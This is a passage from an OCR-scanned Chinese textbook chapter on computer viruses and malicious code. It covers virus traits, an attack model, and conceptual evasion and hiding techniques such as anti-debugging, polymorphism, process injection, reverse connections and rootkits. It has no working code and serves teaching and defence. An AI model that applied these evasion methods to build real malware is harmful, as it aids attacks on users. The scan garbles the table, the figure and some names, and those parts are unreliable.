毒 并 没有 对 用 户 计算 机 进行 任何 破坏 ,如 女 鬼 (Joke. Girlghost) 病 毒 。 

10. 捆绑 机 病毒 

捆绑 机 病毒 的 前 级 是 Binder。 这 类 病毒 的 共有 特性 是 病毒 作者 会 使 用 特定 的 捆绑 程序 
将 病毒 与 一 些 应 用 程序 如 QQ IE 捆绑 起 来 ,表面 上 来 看 是 一 个 正常 的 文件 , 当 用 户 运 行 这 
些 拥 绑 病毒 时 ,会 在 表面 上 运行 这 些 应 用 程序 ,然后 隐藏 运行 拥 绑 在 一 起 的 病毒 程序 ,从 而 
给 用 户 造 成 危害 。 如 拥 绑 QQ(Binder. QQPass. QQBin) 、 系 统 杀手 (Binder. killsys) 等 。 


6.2.4 计算 机 病毒 特性 

截止 2011 年 底 ,计算 机 病毒 数量 已 达 3700 多 万 ,但 所 有 计算 机 病毒 都 具有 以 下 4 个 基 
本 特征 。 

1. 隐蔽 性 


计算 机 病毒 的 隐蔽 性 是 指 计算 机 病毒 附加 在 正常 软件 或 文档 中 ,例如 可 执行 程序 .电子 
邮件 、Word 文档 等 ,一 旦 用 户 未 察觉 ,病毒 就 触发 执行 ,潜入 到 受害 用 户 的 计算 机 中 。 目 
前 ,计算 机 病毒 常 利用 电子 邮件 的 附件 作为 隐蔽 载体 ,许多 病毒 通过 邮件 进行 传播 ,例如 
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“Melissa 病毒 "和 “求职 信 ” 病 毒 。 病 毒 的 隐蔽 性 使 其 在 受害 用 户 不 知 不 觉 的 情形 下 实施 传 
染 过 程 ,对 受害 计算 机 造成 系列 危害 操作 , 正 因 如 此 ,计算 机 病毒 才 得 以 扩散 传播 。 

2. 传染 性 

计算 机 病毒 的 传染 性 是 指 计 算 机 病毒 可 进行 自我 复制 ,并 把 复制 的 病毒 附加 到 无 病毒 
的 程序 中 ,或 者 去 替换 磁盘 引导 区 的 记录 ,使 得 附加 了 病毒 的 程序 或 者 磁盘 变 成 了 新 的 病毒 
源 ,从 而 再 次 进行 病毒 复制 ,重复 原来 的 传染 过 程 。 计 算 机 病毒 与 其 他 程序 最 大 的 区 别 在 于 
计算 机 病毒 能 够 传染 ,而 其 他 的 程序 则 不 能 ,而 没有 传染 性 的 程序 就 不 称 之 为 病毒 。 生 物 
病毒 的 传播 载体 是 水 、 实 物 和 空气 ,而 计算 机 病毒 的 传染 载体 是 传递 计算 机 信息 的 实体 ， 
病毒 通过 传染 载体 向 周围 的 计算 机 系统 扩散 。 目 前 ,计算 机 病毒 的 传播 载体 主要 是 磁性 
介质 、 光 盘 和 计算 机 网 络 。 计 算 机 病毒 的 传播 载体 常见 于 免费 软件 .共享 软件 .电子 邮 
件 、 磁 盘 压 缩 程 序 和 游戏 软件 等 。 目 前 ,计算 机 病毒 主要 通过 网 络 传播 ,病毒 的 扩散 速度 
更 快 。 

3. 潜伏 性 

计算 机 病毒 感染 正常 的 计算 机 之 后 ,一般 不 会 立即 发 作 , 而 是 等 到 触发 条 件 满足 时 , 才 
执行 病毒 的 恶意 功能 ,从 而 产生 破坏 作用 。 计 算 机 病毒 的 各 种 触发 条 件 中 最 常见 的 是 特定 
日 期 ,例如 CIH 病毒 的 发 作 时 间 是 每 年 的 4 月 26 日 。 

4. 破坏 性 

计算 机 病毒 对 系统 的 危害 程度 ,取决 于 病毒 设计 者 的 设计 意图 。 有 的 仅仅 是 恶作剧 ,有 
的 破坏 系统 数据 。 简 而 言 之 ,病毒 的 破坏 后 果 是 不 可 知 的 。 由 于 计算 机 病毒 是 一 段 恶 意 的 
程序 , 故 凡是 由 常规 程序 操作 使 用 的 计算 机 资源 ,计算 机 病毒 均 有 可 能 对 其 进行 破坏 。 据 统 
计 , 病 毒 发 作 后 ,造成 的 破坏 主要 有 数据 部 分 丢失 、 系 统 无 法 使 用 、 浏 览 器 配置 被 修改 、 网 络 
无 法 使 用 \ 使 用 受 限 、 受 到 远程 控制 和 数据 全 部 丢失 等 。 据 统计 分 析 , 浏 览 器 配置 被 修改 、 网 
络 无 法 使 用 和 数据 丢失 等 这 几 种 破坏 最 为 常见 。 


6.2.5 计算 机 病毒 的 运行 机 制 


计算 机 病毒 通常 由 三 部 分 组 成 : 复制 传染 部 件 、 隐 藏 部 件 和 破坏 部 件 。 复 制 传染 部 件 
的 功能 是 控制 病毒 向 其 他 文件 的 传染 ; 隐藏 部 件 的 功能 是 防止 病毒 被 检测 到 ; 破坏 部 件 则 
用 在 当 病 毒 符合 激活 条 件 后 ,执行 破坏 操作 。 计 算 机 病毒 将 上 述 三 个 部 分 综合 在 一 起 ,并 将 
其 复制 到 连接 在 网 络 中 的 计算 机 后 ,病毒 就 开始 在 网 络 上 逐渐 传播 。 

计算 机 病毒 的 生命 周期 主要 有 两 个 阶段 。 

第 一 阶段 ,计算 机 病毒 的 复制 传播 阶段 。 这 一 阶段 有 可 能 持续 一 个 星期 到 几 年 。 计 算 
机 病毒 在 这 个 阶段 尽 可 能 隐蔽 其 行为 ,不 干扰 系统 正常 的 功能 。 计 算 机 病毒 主动 搜寻 新 的 
主机 进行 感染 ,如 将 病毒 附 在 其 他 的 软件 程序 中 ,或 者 渗透 到 操作 系统 中 。 同 时 ,可 执行 程 
序 中 的 计算 机 病毒 获取 程序 控制 权 。 在 这 一 阶段 ,发 现 计算 机 病毒 特别 困难 ,这 主要 因为 计 
算 机 病毒 只 感染 少量 的 文件 ,难以 引起 用 户 警 觉 。 

第 二 阶段 ,计算 机 病毒 的 激活 阶段 。 计 算 机 病毒 在 该 阶段 开始 逐渐 地 或 突然 地 破坏 系 
统 。 计 算 机 病毒 的 主要 工作 是 根据 数学 公式 判断 激活 条 件 是 否 满足 ,用 做 计算 机 病毒 的 激 
活 条 件 常 有 日 期 时间、 感染 文件 数 或 其 他 条 件 。 
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6.3 恶意 代码 的 实现 机 理 


早期 恶意 代码 的 主要 形式 是 计算 机 病毒 。20 世纪 80 年 代 ,Cohen 设计 出 一 种 在 运行 
过 程 中 可 以 复制 自身 的 破坏 性 程序 .Adleman 将 它 命名 为 计算 机 病毒 , 它 是 早期 恶意 代码 
的 主要 内 容 。 随 后 ,Adleman 把 病毒 定义 为 一 个 具有 相同 性 质 的 程序 集合 ,只 要 程序 具有 
破坏 、 传 染 或 模仿 的 特点 ,就 可 认为 是 计算 机 病毒 。 这 种 定义 有 将 病毒 内 涵 扩 大 化 的 倾向 ， 
将 任何 具有 破坏 作用 的 程序 都 认为 是 病毒 ,掩盖 了 病毒 潜伏 、 传 染 等 其 他 重要 特征 。 


6.3.1 恶意 代码 的 定义 


20 世纪 90 年 代 末 ,恶意 代码 的 定义 随 着 计算 机 网 络 技术 的 发 展 逐 渐 丰 富 ,Grimes 将 
恶意 代码 定义 为 ,经 过 存储 介质 和 网 络 进行 传播 ,从 一 台 计 算 机 系统 到 另外 一 台 计 算 机 系 
统 ,未 经 授权 认证 破坏 计算 机 系统 完整 性 的 程序 或 代码 。 它 包括 计算 机 病毒 (Computer 
Virus) .蠕虫 (Worms)、 特 洛 伊 木马 (Trojan Horse)、 逻辑 炸弹 (Logic Bombs)、 病 菌 
(Bacteria) 、 用 户 级 Rootkit、 核 心 级 Rootkit、 脚本 恶意 代码 (Malicious Scripts) 和 恶意 
ActiveX 控件 等 。 由 此 定义 ,恶意 代码 两 个 显著 的 特点 是 : 非 授 权 性 和 破坏 性 。 几 种 主要 
的 恶意 代码 类 型 及 其 相关 的 定义 说 明 如 表 6-1 所 示 。 

表 6-1 恶意 代码 的 相关 定义 


恶意 代码 类 型 定义 特点 
指 编制 或 者 在 计算 机 程序 中 插入 的 破坏 计算 机 功能 或 

计算 机 病毒 “| 者 毁坏 数据 ,影响 计算 机 使 用 ,并 能 自我 复制 的 一 组 计 | 潜伏 ,传染 和 破坏 
算 机 指令 或 者 程序 代码 

pe i 
指 一 种 与 远程 计算 机 建立 连接 ,使 远程 计算 机 能 够 通过 

2 有 关 拓 可 本 掺 计划 机 抽 天 放 欺骗 . 隐 项 和 信息 窃取 
指 一 段 谋 入 计算 机 系统 程序 的 ,通过 特殊 的 数据 或 时 间 

i 作为 条 件 触发 ,试图 完成 一 定 破坏 功能 的 程序 了 了 处 
指 不 依赖 于 系统 软件 ,能 够 自我 复制 和 传播 ,以 消耗 系 

病菌 ed pk 传染 和 拒绝 服务 

”| 指 通过 蔡 代 或 者 修改 被 系统 管理 员 或 普通 用 户 执行 的 
用 户 级 Rootkit | 程序 进入 系统 ,从 而 实现 隐藏 和 创建 后 门 的 程序 人 
核心 级 Rootkit | 指 吝 入 操作 系统 内 核 进行 隐藏 和 创建 后 门 的 程序 隐蔽 ,潜伏 


6.3.2 恶意 代码 攻击 机 制 


恶意 代码 的 行为 表现 各 异 ,破坏 程度 千差万别 ,但 攻击 过 程 和 攻击 机 制 大 体 相同 ,其 整 
个 攻击 过 程 主要 分 为 6 个 阶段 。 
(1) 侵入 系统 。 侵 入 系统 是 恶意 代码 实现 其 恶意 目的 的 必要 条 件 。 恶 意 代码 入 侵 的 途 


径 很 多 ,如 : 从 互联 网 下 载 的 程序 本 身 就 可 能 仿 


恶意 代码 ; 接收 已 经 感染 恶意 代码 的 电 
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子 邮件 ; 从 光盘 或 软盘 向 计算 机 系统 安装 软件 ; 黑客 或 者 攻击 者 故意 将 恶意 代码 植 人 系 
统 等 。 

(2) 维持 或 提升 现 有 特权 。 恶 意 代 码 的 传播 与 破坏 必须 次 用 用 户 或 者 进程 的 合法 权限 
才能 完成 。 

(3) 隐蔽 策略 。 为 了 不 让 系统 发 现 恶意 代码 已 经 侵入 系统 ,恶意 代码 可 能 会 通过 改名 、 
删除 源 文件 或 者 修改 系统 的 安全 策略 来 隐藏 自己 。 

(4) 潜伏 。 恶 意 代 码 侵入 系统 后 ,进行 潜伏 ,等 待 一 定 的 条 件 , 待 具有 足够 的 权限 时 ,就 


发 作 并 进行 破坏 活动 。 
(5) 破坏 。 恶 意 代 码 的 本 质 具 有 破坏 性 ,其 目的 是 造成 信息 丢失 泄密 ,破坏 系统 完整 
性 等 。 


(6) 重复 (1) 一 (5) 的 过 程 对 新 的 目标 实施 攻击 。 亚 意 代码 的 攻击 模型 如 图 6-2 所 示 。 


确定 攻击 目标 
搜集 目标 信息 


厂 一 | 恶意 代码 岩 


策略 @ 
| 。 


获得 超级 古 实施 破坏 
户 权限 @ 行为 @ 


图 6-2 恶意 代码 攻击 模型 


6.4 恶意 代码 实现 的 关键 技术 


一 段 好 的 恶意 代码 ,首先 必须 具有 良好 的 隐蔽 性 .生存 性 ,不 能 轻易 被 软件 或 者 用 户 察 
觉 。 其 次 ,必须 具有 良好 的 攻击 性 。 亚 意 代码 的 实现 技术 主要 包括 : 恶意 代码 生存 技术 、 恶 
意 代码 攻击 技术 和 恶意 代码 的 隐藏 技术 。 


6.4.1 恶意 代码 生存 技术 

生存 技术 主要 包括 4 个 方面 : 反 跟 踪 技 术 .加 密 技 术 、 模 糊 变换 技术 和 自动 生产 技术 。 
反 跟 踪 技术 可 以 减少 被 发 现 的 可 能 性 ,加 密 技术 是 恶意 代码 自身 保护 的 重要 机 制 。 

1. 反 跟 踪 技术 


恶意 代码 采用 反 跟 踪 技 术 可 以 提高 自身 的 伪装 能 力 和 防 破译 能 力 ,增加 检测 与 清除 恶 
意 代 码 的 难度 。 目 前 常用 的 反 跟踪 技术 有 两 类 : 反动 态 跟踪 技术 和 反 静 态 分 析 技术 。 
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反动 态 跟 踪 技 术 主 要 包括 以 下 4 方面 内 容 。 

(1) 禁止 跟踪 中 断 。 针 对 调试 分 析 工 具 运行 系统 的 单 步 中 断 和 断 点 中 断 服 务 程 序 , 恶 
意 代码 通过 修改 中 断 服务 程序 的 入 口 地 址 实现 其 反 跟踪 目的 。“1575” 计 算 机 病毒 采用 该 方 
法 将 堆栈 指针 指向 处 于 中 断 向 量 表 中 的 INT 0 一 INT 3 区 域 ,阻止 调试 工具 对 其 代码 进行 
跟踪 。 

(2) 封锁 键盘 输入 和 屏幕 显示 ,破坏 各 种 跟踪 调试 工具 运行 的 必需 环境 。 

(3) 检测 跟踪 法 。 检 测 跟 踪 调 试 时 和 正常 执行 时 的 运行 环境 .中 断 入 口 和 时 间 的 差异 ， 
根据 这 些 差 异 采 取 一 定 的 措施 ,实现 其 反 跟 踪 目 的 。 例 如 ,通过 操作 系统 的 API 函数 试图 
打开 调试 器 的 驱动 程序 句柄 ,检测 调试 器 是 否 被 激活 从 而 确定 代码 是 否 继续 运行 。 

(4) 其 他 反 跟 踪 技术 。 如 指令 流 队列 法 和 逆 指 令 流 法 等 。 

反 静 态 分 析 技 术 主 要 包括 以 下 两 方面 内 容 。 

(1) 对 程序 代码 分 块 加 密 执 行 。 为 了 防止 程序 代码 通过 反 汇 编 进行 静态 分 析 ,程序 代 
码 以 分 块 的 密 文 形式 装 入 内 存 , 在 执行 时 由 解密 程序 进行 译 码 , 某 一 段 代 码 执 行 完 毕 后 立即 
清除 ,保证 任何 时 刻 分 析 者 不 可 能 从 内 存 中 得 到 完整 的 执行 代码 。 

(2) 伪 指 令 法 (Junk Code)。 伪 指令 法 是 指 在 指令 流 中 插入 “ 废 指令 ”, 使 静态 反 汇编 无 
法 得 到 全 部 正常 的 指令 ,不 能 有 效 地 进行 静态 分 析 。 例 如 ,Apparition 是 一 种 基于 编译 器 变 
形 的 Win32 平台 的 病毒 ,编译 器 每 次 编译 出 新 的 病毒 体 可 执行 代码 时 都 要 插入 大 量 的 伪 指 
令 , 既 达到 了 变形 的 效果 ,也 实现 了 反 跟 踪 的 目的 。 此 外 , 伪 指 令 技 术 还 广泛 应 用 于 安 病 毒 
与 脚本 恶意 代码 之 中 。 

2. 加 密 技术 

加 密 技术 是 恶意 代码 自我 保护 的 一 种 手段 ,加 密 技术 和 反 跟 踪 技 术 的 配合 使 用 ,使 得 分 
析 者 无 法 正常 调试 和 阅读 恶意 代码 ,不 知道 恶意 代码 的 工作 原理 ,也 无 法 抽取 特征 串 。 从 加 
密 的 内 容 上 划分 ,加 密 手段 分 为 信息 加 密 、 数 据 加 密 和 程序 代码 加 密 三 种 。 

大 多 数 恶意 代码 对 程序 体 自身 加 密 , 男 有 少数 恶意 代码 对 被 感染 的 文件 加 密 。 例 如 ， 
Cascade 是 第 一 例 采用 加 密 技术 的 DOS 环境 下 的 恶意 代码 , 它 有 稳定 的 解密 器 ,可 以 解密 
内 存 中 加 密 的 程序 体 。Mad 和 Zombie 是 Cascade 加 密 技 术 的 延伸 ,使 恶意 代码 加 密 技术 
走向 32 位 的 操作 系统 平台 。 此 外 ,“ 中 国 炸 弹 ”(Chinese bomb) 和 ”幽灵 病毒 "也 是 这 一 类 恶 
意 代码 。 

3. 模糊 变换 技术 

利用 模糊 变换 技术 ,恶意 代码 每 感染 一 个 客体 对 象 时 ,潜入 宿主 程序 的 代码 互 不 相同 。 
同一 种 恶意 代码 具有 多 个 不 同样 本 ,几乎 没有 稳定 代码 ,采用 基于 特征 的 检测 工具 一 般 不 能 
识别 它们 。 随 着 这 类 恶意 代码 的 增多 ,不 但 使 得 病毒 检测 和 防御 软件 的 编写 变 得 更 加 困难 ， 
而 且 还 会 增加 反 病 毒 软件 的 误 报 率 。 目 前 ,模糊 变换 技术 主要 有 以 下 5 种 。 

(1) 指令 替换 技术 。 模 糊 变换 引擎 (Mutation Engine) 对 恶意 代码 的 二 进 制 代 码 进 行 反 
汇编 ,解码 每 一 条 指令 ,计算 出 指令 长 度 ,并 对 指令 进行 同 义 变换 。 例 如 ,将 指令 XOR 
REG ,REG 变换 为 SUB REG ,REG; 寄存 器 REG1 和 寄存 器 REG2 进行 互 换 ; JMP 指令 和 
CALL 指令 进行 变换 等 。 例 如 ,Regswap 采用 了 简单 的 寄存 器 互 换 的 变形 技术 。 

(2) 指令 压缩 技术 。 模 糊 变换 器 检测 恶意 代码 反 汇 编 后 的 全 部 指令 ,对 可 进行 压缩 的 一 
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段 指令 进行 同 义 压缩 。 压 缩 技 术 要 改变 病毒 体 代码 的 长 度 ,需要 对 病毒 体内 的 跳 转 指令 进行 
重 定位 。 例 如 指令 MOV REG,12345678/ADD REG,87654321 变换 为 指令 MOV REG， 
99999999; 指令 MOV REG ,12345678/PUSHREG 变换 为 指令 PUSH 12345678 等 。 

(3) 指令 扩展 技术 。 扩 展 技术 把 每 一 条 汇编 指令 进行 同 义 扩 展 ,所 有 压缩 技术 变换 的 
指令 都 可 以 采用 扩展 技术 实施 逆 变 换 。 扩 展 技术 变换 的 空间 远 比 压缩 技术 大 得 多 ,有 的 指 
令 可 以 有 几 十 种 甚至 上 百 种 的 扩展 变换 。 扩 展 技术 同样 要 改变 恶意 代码 的 长 度 ,需要 对 恶 
意 代 码 中 的 跳 转 指 令 进行 重 定位 。 

(4) 伪 指 令 技 术 。 伪 指令 技术 主要 是 对 恶意 代码 程序 体 中 插入 无 效 指令 ,例如 空 指 令 ; 
JMP 下 一 指令 和 指令 PUSH REG/MOV REG,12345678/POP REG 等 。 

(5) 重 编译 技术 。 采 用 重 编译 技术 的 恶意 代码 中 携带 恶意 代码 的 源码 ,需要 自 带 编译 
器 或 者 操作 系统 提供 编译 器 进行 重新 编译 ,这 种 技术 既 实现 了 变形 的 目的 ,也 为 跨 平 台 的 恶 
意 代码 出 现 打 下 了 基础 。 尤 其 是 各 类 UNIX/Linux 操作 系统 ,系统 默认 配置 有 标准 C 的 编 
译 器 。 宏 病毒 和 脚本 恶意 代码 是 典型 的 采用 这 类 技术 变形 的 恶意 代码 。 造 成 全 球 范围 传播 
和 破坏 的 第 一 例 变形 病毒 是 Tequtla, 从 该 病毒 的 出 现 到 编制 出 能 够 检测 该 病毒 的 软件 , 研 
究 人 员 花 费 了 9 个 月 的 时 间 。 

4. 自动 生产 技术 

恶意 代码 自动 生产 技术 是 针对 人 工分 析 技 术 而 出 现 的 “计算 机 病毒 生成 器 ”, 即 使 对 
计算 机 病毒 一 无 所 知 的 用 户 , 也 能 组 合 出 算法 不 同 、 功 能 各 异 的 计算 机 病毒 。“ 多 态 性 发 生 
器 ?可 将 普通 病毒 编译 成 复杂 多 变 的 多 态 性 病毒 。 

多 态 变 换 引 擎 可 以 使 程序 代码 本 身 发 生变 化 ,并 保持 原 有 功能 。 保 加 利 亚 的 Dark 
Avenger 是 较为 著名 的 一 个 例子 ,这 个 变换 引擎 每 产生 一 个 恶意 代码 ,其 程序 体 都 会 发 生变 
化 , 反 恶 意 代码 软件 如 果 采 用 基于 特征 的 扫描 技术 ,根本 无 法 检测 和 清除 这 种 恶意 代码 。 


6.4.2 恶意 代码 攻击 技术 


常见 的 攻击 技术 包括 : 进程 注入 技术 三 线程 技术 、 端 口 复 用 技术 、 超 级 管理 技术 .端口 
反 向 连接 技术 和 缓冲 区 溢出 攻击 技术 。 

1. 进程 注入 技术 

当前 操作 系统 中 都 有 系统 服务 和 网 络 服务 ,它们 都 在 系统 启动 时 自动 加 载 。 进 程 注 入 
技术 就 是 将 这 些 与 服务 相关 的 可 执行 代码 作为 载体 ,恶意 代码 程序 将 自身 赔 入 到 这 些 可 执 
行 代码 之 中 ,实现 自身 隐藏 和 启动 的 目的 。 

这 种 形式 的 恶意 代码 只 须 安装 一 次 ,以 后 就 会 被 自动 加 载 到 可 执行 文件 的 进程 中 ,并 且 
会 被 多 个 服务 加 载 。 只 有 系统 关闭 时 ,服务 才 会 结束 ,所 以 恶意 代码 程序 在 系统 运行 时 始终 
保持 激活 状态 。 比 如 恶意 代码 WinEggDropShell 可 以 注入 Windows 下 的 大 部 分 服务 
程序 。 

2. 三 线程 技术 

在 Windows 操作 系统 中 引入 了 线程 的 概念 ,一 个 进程 可 以 同时 拥有 多 个 并 发 线程 。 三 
线程 技术 就 是 指 一 个 恶意 代码 进程 同时 开启 了 三 个 线程 ,其 中 一 个 为 主线 程 ,负责 远程 控制 
的 工作 。 另 外 两 个 辅助 线程 是 监视 线程 和 守护 线程 ,监视 线程 负责 检查 恶意 代码 程序 是 否 
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被 删除 或 被 停止 自 启动 。 

守护 线程 注入 其 他 可 执行 文件 内 ,与 恶意 代码 进程 同步 ,一 旦 进程 被 停止 , 它 就 会 重新 
启动 该 进程 ,并 向 主线 程 提供 必要 的 数据 ,这 样 就 能 保证 恶意 代码 运行 的 可 持续 性 。 例 如 ， 
“中 国 黑客 ”等 就 是 采用 这 种 技术 的 恶意 代码 。 

3. 端口 复 用 技术 

端口 复 用 技术 , 指 重复 利用 系统 网 络 打开 的 端口 (如 25、80、135 和 139 等 常用 端口 ) 传 
送 数 据 , 这 样 既 可 以 欺骗 防火 墙 ,又 可 以 少 开 新 端口 。 端 口 复 用 是 在 保证 端口 默认 服务 正常 
工作 的 条 件 下 复 用 ,具有 很 强 的 欺骗 性 。 例 如 ,特洛伊 木马 Executor 利用 80 端口 传递 控制 
信息 和 数据 ,实现 其 远程 控制 的 目的 。 

4. 超级 管理 技术 

一 些 恶 意 代码 还 具有 攻击 反 恶 意 代码 软件 的 能 力 。 为 了 对 抗 反 恶意 代码 软件 ,恶意 代 
码 采用 超级 管理 技术 对 反 恶 意 代 码 软 件 系 统 进行 拒绝 服务 攻击 ,使 反 恶 意 代码 软件 无 法 正 
常 运行 。 例 如 ,“ 广 外 女生 "是 一 个 国产 的 特洛伊 木马 , 它 采 用 超级 管理 技术 对 “金山 毒霸 ”和 
“天 网 防火 墙 ?进行 拒绝 服务 攻击 。 

5. 端口 反 向 连接 技术 

防火 墙 对 于 外 部 网 络 进 入 内 部 网 络 的 数据 流 有 严格 的 访问 控制 策略 ,但 对 于 从 内 网 到 
外 网 的 数据 却 玻 于 防范 。 端 口 反 向 连接 技术 ,就 是 通过 指令 恶意 代码 攻击 的 服务 端 (被 控制 
端 ) 主 动 连接 客户 端 (控制 端 ) 的 技术 。 

国外 的 Boinet 是 最 先 实现 这 项 技术 的 木马 程序 , 它 可 以 通过 ICO、IRC、HTTP 和 反 向 
主动 连接 这 4 种 方式 联系 客户 端 。 国 内 最 早 实 现 端口 反 向 连接 技术 的 恶意 代码 是 “网 络 神 
偷 ”>.“ 灰 鸽子 ? 则 是 这 项 技术 的 集大成 者 , 它 内 置 FTP、 域 名 .服务 端 主动 连接 这 三 种 服务 
端 在 线 通知 功能 。 

6. 缓冲 区 溢出 攻击 技术 

缓冲 区 溢出 漏洞 攻击 占 远程 网 络 攻 击 的 80%% ,这 种 攻击 可 以 使 一 个 匿名 的 Internet 用 
户 有 机 会 获得 一 台 主 机 的 部 分 或 全 部 的 控制 权 , 代 表 了 一 类 严重 的 安全 威胁 。 恶 意 代码 利 
用 系统 和 网 络 服务 的 安全 漏洞 植 人 并 且 执 行 攻击 代码 ,攻击 代码 以 一 定 的 权限 运行 有 缓冲 
区 溢出 漏洞 的 程序 ,从 而 获得 被 攻击 主机 的 控制 权 。 

缓冲 区 溢出 攻击 成 为 恶意 代码 从 被 动 式 传播 转 为 主动 式 传播 的 主要 途径 。 例 如 ,“ 红 色 
代码 ?利用 IIS Server 上 Indexing Service 的 缓冲 区 溢出 漏洞 完成 攻击 ,传播 和 破坏 等 恶意 
目的 .“ 尼 姆 达 蠕 虫 ? 利 用 IIS 4. 0/5. 0 DirectoryTraversal 的 弱点 ,以 及 红色 代码 I 所 留 下 
的 后 门 ,完成 其 传播 过 程 。 


6.4.3 恶意 代码 的 隐藏 技术 


隐藏 通常 包括 本 地 隐藏 和 通信 和 隐藏。 其 中 本 地 隐藏 主要 有 文件 隐藏 .进程 隐藏 、 网 络 连 
接 隐 藏 、 内 核 模块 隐藏 .编译 器 隐藏 等 ; 网 络 隐藏 主要 包括 通信 内 容 隐藏 和 传输 通道 隐藏 。 

1. 本 地 隐藏 

本 地 隐藏 是 指 为 了 防止 本 地 系统 管理 人 员 察觉 而 采取 的 隐蔽 手段 。 本 地 系统 管理 人 员 
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通常 使 用 “查看 进程 列表 “查看 目录 ”“ 查 看 内 核 模块 *“ 查 看 系统 网 络 连接 状态 ”等 管理 
命令 来 检测 系统 是 否 被 植 人 了 恶意 代码 。 

其 隐藏 手段 主要 有 三 类 : 一 类 方法 是 将 恶意 代码 隐藏 (附着 、 捆 绑 或 替换 ) 在 合法 程序 
中 ,可 以 避 过 简单 管理 命令 的 检查 ; 另 一 方法 是 恶意 代码 能 够 修改 或 替换 相应 的 管理 命令 ， 
也 就 是 把 相应 管理 命令 恶意 代码 化 ,使 相应 的 输出 信息 经 过 处 理 以 后 再 显示 给 用 户 ,就 可 以 
很 容易 地 达到 蒙骗 管理 人 员 ,隐蔽 恶意 代码 自身 的 目的 ; 还 有 一 类 方法 是 分 析 管 理 命令 的 
检查 执行 机 制 ,利用 管理 命令 本 身 的 弱点 巧妙 地 避 过 管理 命令 ,可 以 达到 既 不 修改 管理 命 
令 , 又 达到 隐藏 的 目的 。 

本 地 隐藏 包括 以 下 5 个 方面 。 

(1) 文件 隐蔽 。 最 简单 的 方法 是 定制 文件 名 ,使 恶意 代码 的 文件 更 名 为 系统 的 合法 程 
序 文件 名 ,或 者 将 恶意 代码 文件 附加 到 合法 程序 文件 中 。 稍 复杂 的 方法 是 ,恶意 代码 可 以 修 
改 与 文件 系统 操作 有 关 的 命令 ,使 它们 在 显示 文件 系统 信息 时 将 恶意 代码 信息 隐蔽 起 来 。 
更 复杂 的 方法 是 ,可 以 对 硬盘 进行 低级 操作 ,将 一 些 扇 区 标志 为 坏 块 ,将 文件 隐蔽 在 这 些 
位 置 。 恶 意 代 码 还 可 以 将 文件 存放 在 引导 区 中 避免 一 般 合法 用 户 发 现 。 当 然 恶 意 代码 
程序 在 安装 完成 或 完成 任务 以 后 ,可 以 删除 原 程序 文件 和 运行 中 留 下 的 痕迹 ,以 隐藏 入 
侵 证 据 。 

(2) 进程 隐蔽 。 恶 意 代码 通过 附着 或 替换 系统 进程 ,使 恶意 代码 以 合法 服务 的 身份 运 
行 ,这 样 可 以 很 好 地 隐蔽 恶意 代码 。 可 以 通过 修改 进程 列表 程序 ,修改 命令 行 参数 使 恶意 代 
码 进程 的 信息 无 法 查询 。 也 可 以 借助 Rootkit 技术 实现 进程 隐蔽 。 

(3) 网 络 连接 隐蔽 。 恶 意 代 码 可 以 借用 现 有 服务 的 端口 来 实现 网 络 连接 隐蔽 ,如 使 用 
80CHTTP) 端 口 ,将 自己 的 数据 包 设置 特殊 标识 ,通过 标识 识别 连接 信息 ,未 标识 的 WwWWW 
服务 网 络 包 仍 转交 给 原 服务 程序 处 理 。 使 用 隐 项 通道 技术 进行 通信 时 可 以 隐 项 恶意 代码 自 
身 的 网 络 连接 。 

(4) 编译 器 隐蔽 。 使 用 该 方法 可 以 实施 原始 分 发 攻击 ,恶意 代码 的 植 入 者 是 编译 器 开 
发 人 员 。 主 要 思想 如 下 。 

第 一 步 : 修改 编译 器 的 源 代码 A, 植 人 恶意 代码 ,包括 针对 特定 程序 的 恶意 代码 和 针对 
编译 器 的 恶意 代码 。 经 修改 后 的 编译 器 源码 称 为 B。 

第 二 步 : 用 干净 的 编译 器 C 对 B 进行 编译 得 到 被 感染 的 编译 器 D。 

第 三 步 : 删除 B, 保 留 D 和 A, 将 D 和 A 同 时 发 布 。 

以 后 ,无 论 用 户 怎 样 修改 系统 源 程序 ,使 用 D 编译 后 的 目标 执行 程序 都 包含 恶意 代码 。 
而 更 严重 的 是 用 户 无 法 查 出 原因 ,因为 被 修改 的 编译 器 源码 B 已 被 删除 ,发 布 的 是 A, 用 户 
无 法 从 源 程 序 中 看 出 破绽 ,即使 用 户 使 用 D 对 A 重新 进行 编译 ,也 无 法 清除 隐蔽 在 编译 器 
二 进 制 代码 中 的 恶意 代码 。 

(5) Rootkit 隐蔽 。Windows 操作 系统 中 的 Rootkit 分 为 两 类 : 用 户 模 式 下 的 Rootkit 
和 内 核 模 式 下 的 Rootkit。 两 种 Rootkit 的 目的 都 是 隐藏 恶意 代码 在 系统 中 的 活动 。 用 户 
模式 下 的 Rootkit 修改 二 进 制 文件 ,或 者 修改 内 存 中 的 一 些 进 程 ,同时 保留 它们 受到 限制 的 
通过 API 访问 系统 资源 的 能 力 。 用 户 模 式 下 的 Rootkit 最 显著 的 特点 是 驻 留 在 用 户 模 式 
下 ,需要 的 特权 小 ,更 轻便 ,用 途 也 多 种 多 样 , 它 隐藏 自己 的 方式 是 修改 可 能 发 现 自己 的 进 
程 。 例 如 ,修改 Netstat. exe, 使 之 不 能 显示 恶意 代码 使 用 的 网 络 连 接 。 
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内 核 模式 下 的 Rootkit 比 用 户 模式 下 的 Rootkit 隐藏 性 更 好 , 它 直接 修改 更 底层 的 系统 
功能 ,如 系统 服务 调用 表 , 用 自己 的 系统 服务 调用 函数 蔡 代 原 来 的 函数 ,或 者 修改 一 些 系 统 
内 部 数据 结构 比如 活动 进程 链表 等 ,从 而 可 以 更 加 可 靠 地 隐藏 自己 。 

从 上 述 隐 项 方法 来 看 ,恶意 代码 植 入 的 位 置 越 靠近 操作 系统 底层 越 不 容易 被 检测 出 来 ， 
对 系统 安全 构成 的 威胁 也 就 越 大 。 

2. 网 络 隐蔽 

现在 计算 机 用 户 的 安全 意识 较 以 前 有 了 很 大 提高 。 在 网 络 中 ,普遍 采用 了 防火 墙 \ 人 侵 
检测 和 漏洞 扫描 等 安全 措施 。 那 种 使 用 传统 通信 模式 的 恶意 代码 客户 端 与 服务 端 之 间 的 会 
话 已 不 能 逃避 上 述 安全 措施 的 检测 ,恶意 代码 需要 使 用 更 加 隐蔽 的 通信 方式 。 

使 用 加 密 算 法 对 所 传输 的 内 容 进 行 加 密 能 够 隐蔽 通信 内 容 。 隐 项 通信 内 容 虽 然 可 以 保 
护 通信 内 容 , 但 无 法 隐蔽 通信 状态 ,因此 传输 信道 的 隐蔽 也 具有 重要 的 意义 。 对 传输 信道 的 
